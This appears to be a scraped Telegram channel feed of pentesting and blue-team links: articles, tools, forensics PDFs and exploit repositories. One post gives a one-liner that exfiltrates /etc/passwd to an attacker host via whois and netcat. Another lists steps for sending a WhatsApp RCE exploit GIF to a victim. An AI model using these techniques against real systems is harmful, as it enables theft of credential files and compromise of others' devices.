Pentester
@news4hack
2.95K subscribers
120 photos
3 videos
163 files
2.77K links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analisys
- Web Security
Download Telegram
About
Blog
Apps
Platform
Join
Pentester
2.95K subscribers
Pentester
https://medium.com/@fabs_60995/joern-reborn-f04e74399b2b
Medium
Joern Reborn
In a blog post back in May 2018, we outlined our plans for saving the open-source C/C++ code analyzer “Joern”. Today, we are happy to…
78 views
Pentester
75 views
Pentester
Android_Security_Internals_An_In.pdf
7.7 MB
180 views
Pentester
SQL Injection Step By Step:
Part 1:
https://t.co/sKX3RERldM
Part 2:
https://t.co/kS2Qom5DX6
Medium
SQL Injection Step By Step Part 1
If you want to learn SQL Injection step by step, then after reading this article will help you to understand SQL Injection step by step…
91 views
Pentester
https://medium.com/@d0znpp/security-testing-guide-for-json-rest-apis-1-3-38eddba67098
Medium
Security testing guide for JSON / REST APIs #1/3
Fuzzing is everything ;) It’s the most useful and resultative hacking technique for sure. At the same time, fuzzing is not just random…
95 views
Pentester
How to Reverse Engineer an iOS App and macOS Software
https://www.apriorit.com/dev-blog/363-how-to-reverse-engineer-os-x-and-ios-software
Apriorit
How to Reverse Engineer an iOS App - Apriorit
Learn how to reverse engineer an iOS app, break down its components, and understand functionality without source code access for debugging or maintenance.
102 views
Pentester
The Linux Forensics workshop (labs, slides, forensic images "E01")+talk done at OSDFCon 2019, is now available here: https://t.co/7aeHMNaVQI
GitHub
ashemery/LinuxForensics
Everything related to Linux Forensics. Contribute to ashemery/LinuxForensics development by creating an account on GitHub.
103 views
Pentester
https://www.hahwul.com/2019/10/find-subdomain-takeover-with-amass-and-subjack.html?m=1
102 views
Pentester
Cheatsheet-God:-
Penetration Testing Biggest Reference Bank - OSCP / PTP & PTX Cheatsheet:-

https://t.co/mApUr4FBqW
GitHub
OlivierLaflamme/Cheatsheet-God
Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet - OlivierLaflamme/Cheatsheet-God
131 views
Pentester
https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/?preview=true
Shielder
Shielder - Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, …
The LSP4XML library used by many IDE and editors was affected by an XXE which lead to RCE exploitable by just opening an XML file.
98 views
Pentester
https://medium.com/@olafhartong/assess-your-data-potential-with-att-ck-datamap-f44884cfed11
Medium
Assess your data potential with ATTACK Datamap
While helping clients that chose to work on coverage of the ATT&CK framework I found myself lacking a solid way to represent their options…
89 views
Pentester
Have limited ways to exfiltrate data? Use Whois!

attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d

victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64
76 views
Pentester
https://github.com/neex/phuip-fpizdam
GitHub
GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043
Exploit for CVE-2019-11043. Contribute to neex/phuip-fpizdam development by creating an account on GitHub.
69 views
Pentester
https://github.com/Edu4rdSHL/findomain
GitHub
GitHub - Findomain/Findomain: The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP…
The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP check, data import from other tools, subdomain monitoring, alerts via Discord, Slack and Telegram, ...
70 views
Pentester
Privesc - Windows batch script that finds misconfiguration issues which can lead to privilege escalation https://t.co/TQacBYeylG
GitHub
GitHub - enjoiz/Privesc: Windows batch script that finds misconfiguration issues which can lead to privilege escalation.
Windows batch script that finds misconfiguration issues which can lead to privilege escalation. - enjoiz/Privesc
69 views
Pentester
https://googleprojectzero.blogspot.com/2019/10/ktrw-journey-to-build-debuggable-iphone.html?m=1
Blogspot
KTRW: The journey to build a debuggable iPhone
Posted by Brandon Azad, Project Zero In my role here at Project Zero, I do not use some of the tooling used by some external iOS securit...
78 views
Pentester
[PoC] CVE-2019-11932 Whatsapp 2.19.216 Remote Code Execution

1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user

https://t.co/dpeiJOpg4m
https://t.co/lXWWAcq8Y4
GitHub
GitHub - dorkerdevil/CVE-2019-11932: double-free bug in WhatsApp exploit poc
double-free bug in WhatsApp exploit poc. Contribute to dorkerdevil/CVE-2019-11932 development by creating an account on GitHub.
87 views
Pentester
97 views
Pentester
WhatsApp Forensics.pdf
3.4 MB
214 views
Pentester
A curated list of fuzzing resources ( Books, courses - free & paid, videos, tools, tutorials & vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.

https://t.co/5zu0MtfDPT
GitHub
secfigo/Awesome-Fuzzing
A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Develo...
97 views
Pentester
https://medium.com/@libyaazy/ssrf-server-side-request-forgery-10028135537c
Medium
SSRF — Server Side Request Forgery
First things first
94 views